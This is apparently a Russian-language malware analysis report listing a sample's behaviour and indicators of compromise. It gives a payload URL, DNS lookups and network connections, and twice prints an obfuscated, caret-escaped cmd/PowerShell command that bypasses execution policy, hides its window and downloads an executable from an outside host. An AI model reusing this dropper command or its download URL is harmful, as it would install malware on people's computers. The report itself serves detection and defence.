Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^w^E^r^shEL^l^.^EX^e -EX^ECu^Ti^ONp^O^licy ^b^Y^p^AsS^ -^n^o^P^R^OFILE^ ^-^WInDowS^Ty^lE h^IDDEN (NEw-^oBJE^ct s^Yst^E^M.^nET^.We^b^c^LiEn^T^).DOW^nlO^ADFIl^E('http://nexcontech.c...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /C "po^w^E^r^shEL^l^.^EX^e -EX^ECu^Ti^ONp^O^licy ^b^Y^p^AsS^ -^n^o^P^R^OFILE^ ^-^WInDowS^Ty^lE h^IDDEN (NEw-^oBJE^ct s^Yst^E^M.^nET^.We^b^c^LiEn^T^).DOW^nlO^ADFIl^E('http://nexcontech.c...' (со скрытым окном)